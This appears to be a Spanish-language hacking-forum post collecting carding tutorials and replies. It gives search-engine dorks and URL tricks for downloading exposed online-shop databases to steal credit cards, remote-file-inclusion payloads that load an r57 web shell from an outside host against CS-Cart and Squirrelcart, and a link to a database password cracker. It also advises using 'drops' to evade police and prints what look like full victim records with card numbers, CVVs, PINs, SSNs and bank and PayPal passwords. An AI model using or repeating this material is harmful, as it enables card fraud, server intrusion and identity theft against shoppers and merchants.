HackPR.NET

Conseguir BD de tarjetas de credito


1.-Introduccion.

2.-¿En que se basa el bug?.

3.-Buscando victimas.

4.-Explotando el fallo.

5.-Explicacion del objetivo(donde se encuentran las tarjetas).

6.-Despedida.

-----------------------------------------------------------------------

1.- Bueno...primero que nada Holas! este manual creado por mi La-Base
     les explica como hacer para acceder a base de datos de tarjetas de
     credito,lo hice con el fin de mejorarme un poco mas desde mi punto
     de vista,si alguien compra cosas con las bd que obtengan yo no me
     ago responsable..ya que yo solamente planteo un manual osea el bug
     no lo descubri yo xD.
     Las bd q encuentren no tiene lo mas importante,el codigo de seguridad,
     por ello deberan buscar otro manual  en el cual indique como desifrar los
     cvv de dichas tarjetas.La cuestion es facil solamente un par de cuentas
     y listo xD.
------------------------------------------------------------------------
2.- En este caso el bug consiste en simplemente agregar una frase al termino
     de la url con el motivo de acceder a la descarga de la bd,ya que es publica
     y no se nesesita permiso para descargarla. Si agregando las palabras que mencionare
     en el paso 4 no se puede descargar la base de datos es porque dicha web no es vulnerable
     y abra que probar con otra :p.
-------------------------------------------------------------------------
3.- Para buscar viktimas pues iremos al señor google que siempre nos ayuda en todo
     y nos facilitara la busqueda manual. Bien para ello vamos a www.google.com y ponemos
     en el buscador esta frase "allinurl: mall/lobby.htm" recuerden que las comillas no van :p
     bueno ahora tenemos un monton de webs para empesar a probar simplemente se nesesita tiempo.
      Se daran cuenta si pueden acceder a la bd porque comenzara la descaerga,de lo contrario no
     es vulnerable.
--------------------------------------------------------------------------
4.- El fallo se explota de la siguiente forma: Al obtener la web tiene que ser asi
     www.site.com/mall/lobby.htm entonces a eso se modificara para dejar solamente la web y
     se le agregara al  final una palabra que quedaria asi: www.site.com/fpdb/shop.mdb si se dan
     cuenta borramos /mall/lobby.htm y pusimos /fpdb/shop.mdb de esta forma nos permite obtenerla
     y gozar de nuestras tarjetas.
---------------------------------------------------------------------------
5.- Bueno ahora ustedes preguntaran...¿Donde estan las tarjetas? jajaja lo mas importante verdad?
     entonces para tenerlas tenemos que minimizar el primer especie de programa que se nos aparece
     ya que no aremos nada con el en este manual. Una ves minimizado nos queda otra ventana que se llama
     shop,la cual la abriremos y seleccionaremos tablas,luego tiene que mirar el apartado que dice
     payment o pyment :p el cual le daran doble click y guala!!!! ahi estan las tarjetas de credito.
      Puede ocurri que dicha base de datos este vacia  como puede ser?? La-Base nos engaño?? jaja
     no,paso que en esa web no se realizaron compras por lo tanto no ahi ninguna tarjeta. Entonces
     tendran que buscar otra base o esperar a que alguna persona compre algo.
-----------------------------------------------------------------------------
6.-Bueno me tengo que despedir amigoss!!! este es mi primer manual de carding y en total con otros
    temas creo que el 3ero :p jaja bueno espero que les alla gustado..y si no encuentran muchas bd
    en google cosa que no creo,pues intenten con otros buscadores que es lo mismo.Con respecto a los
    codigos de seguridad que no estan pues busquen algun manual o si alguien tiene alguno que lo diga
    cosa que facilite el trabajo a otras personas que quieren realizar la tecnica.
     Hasta luego amigoss nos estamos viendo,recueden que si postean el manual en alguna web dejen todo
    como esta plis para no equivocarse en nada :p un saludo les manda La-Base.
------------------------------------------------------------------------------

1.- Introduccion:

En este documento no pretendo crear Carders ni mafias que se dediquen a estafar, y a manchar el buen nombre de este Arte, si no mas bien lo que pretendo es difundir los conocimientos que he adquirido en los meses que llevo absorbiendo información sobre este tema.Para meterme de lleno en el carding como muchos de vosotros que estéis leyendo este tutorial no lo tuve fácil, la gente que conoce este arte no esta dispuesta así como así a difundirlo, muchas veces por miedo a ser delatados, y otras muchas por avaricia al saber, como yo carezco de esos dos motivos me dispongo a crear un tutorial que se propague por la red a la velocidad que se propagan los mejores virus.No empezare la introducción como muchos otros tutoriales de hacking diciendo que no encontraréis maneras de conseguir tarjetas fácilmente por que mentiría, tampoco diré que sabiendo utilizar este arte aprenderéis lo poco que significa el dinero, por que también mentiría y como no tampoco diré que los únicos culpables de lo que aguáis con esta información seréis vosotros. Espero que no os saltéis ningún capítulo ya que me gustaría que al finalizar el tutorial acabéis aprendiendo a ser Carders, Legales,Buenos,Elites o como queráis llamarlos no me gustaría que acabéis siendo los típicos lamos que van por foros las 24 horas del día esperando que caiga alguna tarjeta para gastarla en vídeos porno.



2.- Terminos:

Bien tomar asiento, encenderos un cigarrito (los que fumeis), y prepararos para comenzar a absorver informacion, empezemos por los terminos, un buen carder no puede ir por la red sin saber de que habla, debe conocer los terminos en los que debera moverse dia a dia, los utilizareis sobre todo al hablar con otros carders, al hacer tratos etc.

    * CARDING: La palabra Carding es el cojunto de todas las palabras siguientes, esta engloba todas en una luego tienes sus variantes como Cardeable, Carder etc que mas adelante veremos.



    * DROP: Un buen Carder debe tener minimo un Drop listo para funcionar, el Drop es una persona que recibe el envio del objeto fisico y una vez recibido te lo envia a ti, os preguntareis para que hacer dos viajes pudiendo hacer uno? bien pues imaginaros que la tienda donde habeis cardeado se da cuenta que la compra a sido una estafa, empezaran por denunciar la ip del comprador, seguidamente ver donde se ha mandado el producto, cancelar el envio si no es demasiado tarde, y claro esta la policia cibernetica o de estafas se pondra en marcha para saber a que direccion fue el paquete, tambien decir que no muchos paises pueden permitirse el lujo de investigar estos delitos. Bien pues aqui es donde entra el Drop, en el 90% de las compras no pasara nada si seguis los consejos de las lecciones siguientes claro, pero siempre hay un porcentaje que se den cuenta de la estafa e investiguen de donde se realizo y a donde se envió el paquete, imaginarios que investigan y llegan hasta vuestro Drop, que pasaría? lo normal es que verían que la ip de comprador no contrasta con su ip es mas, nisikiera tiene pc xD en los casos que el drop no tenga ni pc es bastante mejor ya que se libraría al instante de la culpabilidad y aun teniendo no tendrían pruebas el lo único que a echo es ver que le a llegado un paquete por correos ya pagado y el como ciudadano normal y corriente a aprovechado y lo a aceptado cual delito se le aplicaría? ni siquiera una multa. como máximo devolver el paquete. -Pero como usted no conoce a la persona que a estafado por internet a esta tienda este objeto? no no señor yo ni siquiera se lo que es una estafa, ni siquiera tengo pc xD. En fin a lo largo de vuestra instrucción por la red os encontraréis con muchos de estos personajes denominados Drops, pensar que realizan una gran labor del trabajo y como tal deben llevarse una comisión, normalmente se suelen llevar un duplicado del objeto que compréis es decir, yo quiero una PSP la ultima consola de sony por ejemplo, pues se hace un trato con el Drop y envezde 1 se piden 2 una para mi y otra para el , cuando el las reciba el se queda una y la otra te la envía claro esta los gastos de envío corren a su cuenta. Como os daréis cuenta la relación entre el Drop y el Carder va siempre unida, el carder no hace nada sin el drop y el drop no hace nada sin el carder mutuamente se saltan la ley para beneficio propio. Es aconsejable que el Drop sea de países como Venezuela,Brasil,Colombia,Chile, todos algo pobres en temas de leyes informáticas por no decir muy pobres xD claramente de ayi son casi todos los carders. se que me dejo muchos países pero no quiero llenar el tutorial con todos.





    * PHISING o SCAM : Es el acto que consiste en recomendar la visita a una pagina webfalsa, haciendo creer al visitante que se encuentra en la página original o copiada. La vía de difusión más habitual de esta técnica es el correo electrónico, aunque últimamente se han detectado vías alternativas como el teléfono o el fax. Normalmente se utiliza con fines delictivos, duplicando páginas web de entidades financieras de renombre. Una vez en las páginas falsas, se pide al visitante que introduzca datos personales (claves de acceso, etc.) que posteriormente son usados por los creadores de la estafa. Las entidades recomiendan que no se revelen nunca las claves personales aunque sean pedidas en nombre de tales entidades.En ocasiones, el término "phishing" se dice que es la contracción de "password harvesting fishing" (cosecha y pesca de contraseñas), aunque esto probablemente es un acrónimo retroactivo.De forma más general, el nombre phishing también se aplica al acto de adquirir, de forma fraudulenta y a través de engaño, información personal como contraseñas o detalles de una tarjeta de crédito, haciéndose pasar por alguien digno de confianza con una necesidad verdadera de tal información en un e-mail parecido al oficial, un mensaje instantáneo o cualquier otra forma de comunicación. Es una forma de ataque de la ingeniería social. Puede verse un ejemplo en http://purl.org/net/tbc/misc/phish001.htm (en inglés).El término phishing fue creado a mediados de los por los crackers que procuraban robar las cuentas de AOL. Un atacante se presentaría como empleado de AOL y enviaría un mensaje inmediato a una víctima potencial. El mensaje pediría que la víctima revelara su contraseña con variadas excusas como la verificación de la cuenta o confirmación de la información de la facturación. Una vez que la víctima entregara la contraseña, el atacante podría tener acceso a la cuenta de la víctima y utilizarla para cualquier otro propósito, tales como Spamming.





    * RIPPER: Se denomina Ripper a una persona con la que haces un trato en el mundo de los carders y acaba estafandote por medio de mentiras o trampas, estas personas estan al margen del honor, y no son mas que personas con pocos conocimientos de carding , maleficas y sin honor, la avaricia les acaba trallendo problemas y la carcel esta llena de estas personas.



    * CARDEABLE: Se denomina cardeable cuando hablamos de una tienda online da igual el servicio que de pero que acepte las compras sin problemas, por ejemplo voy a comprar un hosting en algunas empresas me pueden pedir datos muy especificos y raros de conseguir, ademas de ponerme muchas trabas para la compra, eso no seria cardeable, encambio una web que me diera el hosting solo introduciendo pocos datos y que me de el servicio pagado pronto y sin problemas seria cardeable.



3.- Tipos De Tarjetas:

American Express = 3AXX XXXXXX XXXXX (A = 4 or 7)

enRoute = 3ABC XXXXXX XXXXX (ABC = 014 or 149)

Visa = 4XXX XXXX XXXX XXXX Mastercard = 5AXX XXXX XXXX XXXX (A = 1-5)

Discover = 6011 XXXX XXXX XXXX Diners Club 3AXX XXXXXX XXXX (A = 0 or 6 or Cool

JCB = 3ABC XXXX XXXX XXXX (ABC = 088,096,112,158,337 or 528)

Este es un esquema que os ayudara a entender la forma de las tarjetas que hay actualmente. komo veis cada una comienza por un digito y se divide en varias partes.

Cuando hablamos de cc o cc´s nos referimos a tarjetas de credito claro esta, tambien podemos llamarlas segun los datos que tengamos si decimos tener una cc FULL seria una asi:



Name on card : George T Blood Numbers

on Card : 6011009020587437

Expiration Date : 04 / 07 CCV : 318 PIN :

Card Type : dsc Country :

United States City : University Place State :

WA Zip : 98467 Adress : 5231 58th

Ave W. Phone : 253 759 8769

-=-=Personal Info-=-=-= SSN : DOB : MMN :

User : [email protected]

Pass : 5239lady ---

Firstname: Judith Lastname:

Howes Address: 818 E. Slaton Ln.

City: Deer Park State:

WA Zipcode: 99006

Phone: 509-276-6401

SSN: 516-60-6467

Mother'sMaidenName: Bernice Kintschi Drive

Licence: HOWESJA473NO

IssuedState: WA DOB: 08-20-1953

CardType: Debit Cardname: Judith A. Howes

Cardnumber: 4366189296726608 Expiry Date: 01-2007 CVV2: 928 ATM Pin: 2550 BankName: US Bank BankPhone: 1800usbanks RoutingNumber: 125000105 Account Number: 153502384099 PaypalEmail: [email protected] PaypalPassword: 25shakucat -----





Como veis es completisima y claro esta tienes TODOS los datos para hacer compras o lo que quieras, incluso transferencias.

4.- Utilidades:

Podreis encontrar por toda la red bastantes programas, para distintos funcionamientos basados en carding.



5- Leyes:

Aqui os dejo las leyes informaticas de varios Paises para que os informeis. No le deis mucha importancia o os entrara miedo hasta  bajaros peliculas xD.

Delitos Informaticos ESPAÑA  http://delitosinformaticos.com/legislacion/espana.shtml

Delitos Informaticos Argentina  http://delitosinformaticos.com/legislacion/argentina.shtml

Delitos Informaticos Chile     http://delitosinformaticos.com/legislacion/argentina.shtml

Delitos Informaticos Costa Rica    http://delitosinformaticos.com/legislacion/costarica.shtml

Delitos Informaticos Peru     http://delitosinformaticos.com/legislacion/peru.shtml

Delitos Informaticos Venezuela   http://delitosinformaticos.com/legislacion/venezuela.shtml

Hola! Aki les voy a explicar como cardear Showcat.

Busqueda: inurl:"showcat.asp?cat=" inurl:"path="

Les saldran bastantes webs como por ejemplo:
http://www.omniaoffice.com/shop/showcat.asp?cat=55&path=55

Quitan lo de showcat.asp?cat=55&path=55 y le añaden db/store.mdb

Kedaria asI:
http://www.omniaoffice.com/shop/db/store.mdb

Si es vulnerable nos saldra para bajar la db, sino nop.

Cuando se la bajen al PC, la abren, sacan las CC y a comprar!!!

Si les pide alguna pass para abrir la DB utilizen ese programa para ke lo cracke y nos de la pass:
http://rapidshare.de/files/18272524/mdbcrck.zip.html

Salu2

Busqueda de Webs: Powered by CS-Cart - Shopping Cart Software

Inyeccion RFI: /classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://usuarios.lycos.es/tx15/shells/r57.txt?
-----------------------------------------------------------------------------------------------------------------------
Busqueda de webs: inurl:/squirrelcart/

Exploit: /cart_content.php?cart_isp_root=http://usuarios.lycos.es/tx15/shells/r57.txt?

estos temas no deberian ser abiertos a todo el publico.... creanme que se porq se los digo...

muy buen aporte .. pero estos bug ya fueron explotados hace meses y no kedan webs ke tenga este tipo de bug .. o si kedan las db estan kemadisimas ;)

Claro esque era para dar un aporte para q los newbies en esto del carding sientan lo q es el robo de una base de datos de dinero!

No se como les pueda servir estoy a ustedes.. yo apenas estoy probando....

http://eidro.com/~infoleak/ecom.txt

Si pueden hacer algo me dicen :)